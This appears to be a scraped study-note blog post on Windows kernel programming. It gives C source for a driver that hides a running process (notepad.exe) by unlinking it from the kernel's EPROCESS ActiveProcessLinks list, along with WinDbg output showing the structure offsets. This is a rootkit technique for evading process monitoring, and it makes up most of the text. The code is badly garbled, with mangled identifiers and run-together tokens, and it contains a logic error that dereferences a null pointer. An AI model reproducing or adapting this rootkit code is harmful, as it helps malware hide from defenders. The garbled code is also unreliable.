RING0 process hiding implementation

Recently in learning kernel programming, record recent study notes.

Principle: Remove the current process from the list of eprocess structures

Can't be! Process 0 0 See

#include"HideProcess.h"#ifdef WIN64#defineActiveprocesslinks_eprocess 0x188#defineImagefilename_eprocess 0x2e0//a 16-byte single word group#else#defineActiveprocesslinks_eprocess 0x088#defineImagefilename_eprocess 0x174//a 16-byte single word group#endifNTSTATUS driverentry (pdriver_object driverobject,punicode_string registerpath) {pdevice_object DeviceObject;    NTSTATUS Status; inti =0;    Unicode_string devicename;    Unicode_string linkname; Rtlinitunicodestring (&devicename,device_name); Rtlinitunicodestring (&linkname,link_name); //create a Device object;Status= IoCreateDevice (DriverObject,0,    &devicename,file_device_unknown,0,false,&deviceobject); if(!nt_success (Status)) {        returnStatus; } Status= Iocreatesymboliclink (&LinkName,&devicename);  for(i =0; i<irp_mj_maximum_function; i++) {DriverObject->majorfunction[i] =Defaultpassthrough; } DriverObject->driverunload =Unloaddriver; if(Hideprocess ("notepad.exe") ==FALSE) {Dbgprint ("No exist\r\n"); } #ifdef WIN64 Dbgprint ("win64:hideprocess is RUNNING!!!");#elseDbgprint ("win32:hideprocess SIS RUNNING!!!");#endif        returnstatus_success;} NTSTATUS Defaultpassthrough (pdevice_object deviceobject,pirp IRP) {IRP->iostatus.status =status_success; IRP->iostatus.information =0;    IoCompleteRequest (irp,io_no_increment); returnstatus_success;}    VOID unloaddriver (Pdriver_object driverobject) {unicode_string linkname; Pdevice_object Nextdeviceobject=NULL; Pdevice_object Currentdeviceobject=NULL; Rtlinitunicodestring (&linkname,link_name); Iodeletesymboliclink (&linkname); Currentdeviceobject= driverobject->DeviceObject;  while(Currentdeviceobject! =NULL) {Nextdeviceobject= currentdeviceobject->Nextdevice;        Iodeletedevice (Currentdeviceobject); Currentdeviceobject=Nextdeviceobject; } dbgprint ("hideprocess is STOPPED!!!");} BOOLEAN hideprocess (Char*processimagename) {    //through Process eprocess (Objectheader objectbody)    /*    Kd>!process 0 0 process fffffa8031ec9060 sessionid:1 cid:073c peb:7fffffdf000 parentcid:06f8 Dir    base:7fb21000 objecttable:fffff8a001ea3600 handlecount:545.      Image:explorer.exe kd> DT _eprocess fffffa8031ec9060 +0x000 PCB: _kprocess +0x160 Processlock : _ex_push_lock +0x168 createtime: _large_integer 0x01d29b23 ' d17ef664 +0x170 exittime: _LARGE_IN Teger 0x0 +0x178 rundownprotect: _ex_rundown_ref +0x180 uniqueprocessid:0x00000000 ' 0000073c Void +0x188 Act Iveprocesslinks: _list_entry [0xfffffa80 ' 31aeb1e8-0xfffffa80 ' 3265da98] +0x198 processquotausage: [2] 0X3DC8 KD            > dt _list_entry nt!_list_entry +0x000 flink:ptr64 _list_entry Next listentry +0x008 Blink              : Ptr64 _list_entry Previous kd> dt _eprocess 0xfffffa80 ' 31aeb1e8-0x188 nt!_eprocess +0x000 PCB : _kprocess +0x188 activeprocesslinks: _list_entry [0xfffffa80 '31ec84d8-0xfffffa80 ' 31ec91e8] +0x2e0 imagefilename: [] "Vmtoolsd.exe" [Bearish][system][][][][explorer][vmtools     D*/plist_entry ListEntry=NULL; Peprocess eprocess=NULL; Peprocess v1=NULL; Peprocess emptyeprocess=NULL; Char* Imagefilename =NULL; Eprocess=psgetcurrentprocess (); if(Eprocess = =NULL) {        returnFALSE; } imagefilename= (Char*) ((uint8*) v1 +imagefilename_eprocess); Dbgprint ("currentimagefilename:%s\r\n", Imagefilename); V1= Eprocess;//System.exe eprocess//System.exe's former is actually a short node.ListEntry = (plist_entry) ((uint8*) eprocess + activeprocesslinks_eprocess);//0x188Emptyeprocess = (peprocess) (((ULONG_PTR) (Listentry->blink))-activeprocesslinks_eprocess); ListEntry=NULL;  while(v1! = emptyeprocess)//system!= Short Node{imagefilename= (Char*) ((uint8*) v1 + imagefilename_eprocess);//System.exe Calc.exe//dbgprint ("imagefilename:%s\r\n", szimagefilename); ListEntry = (plist_entry) ((ulong_ptr) v1 +activeprocesslinks_eprocess); if(Strstr (Imagefilename, processimagename)! =NULL) {            if(ListEntry! =NULL)                {removeentrylist (listentry);  Break; }} v1= (peprocess) (((ULONG_PTR) (Listentry->flink))-activeprocesslinks_eprocess);//Calc    }    returnTRUE;}

RING0 process hiding implementation